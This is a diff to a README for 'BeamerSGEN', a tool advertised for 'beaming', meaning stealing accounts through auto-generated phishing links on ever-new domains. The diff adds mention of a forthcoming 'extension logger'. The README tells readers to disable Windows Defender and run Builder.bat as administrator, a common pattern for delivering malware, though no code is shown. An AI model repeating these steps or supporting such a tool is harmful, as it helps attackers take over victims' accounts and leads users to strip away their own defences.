BeamerSGEN/BeamerSGEN_FREE/README.md

 > **>** **Disable Windows Defender (being a tool that uses python with api sites the download can be blocked)**

 **WHY USE BEAMERS GENERATOR ?**
-> ***WE ARE THE BEST AND THE FIRST WHO CREATED A TOOL FOR AUTOMATIZE AND GET ONLY WORKING GENERATOR WITH ALWAYS NEW DOMAINS, A COMPACT PROGRAM FOR GET ALL THE TOOLS TO BEAM SKIDS***
+> ***WE ARE THE BEST AND THE FIRST WHO CREATED A TOOL FOR AUTOMATIZE THE CREATION LINK AND GET ONLY WORKING GENERATOR WITH ALWAYS NEW DOMAINS, A COMPACT PROGRAM FOR GET ALL THE TOOLS TO BEAM SKIDS (!!SOON EXTENSION LOGGER!!)***

 **HOW RUN ?**
 > **>** Extract here `BeamerSGen.rar` **➙** **__Open as Adminstrator__** `Builder.bat`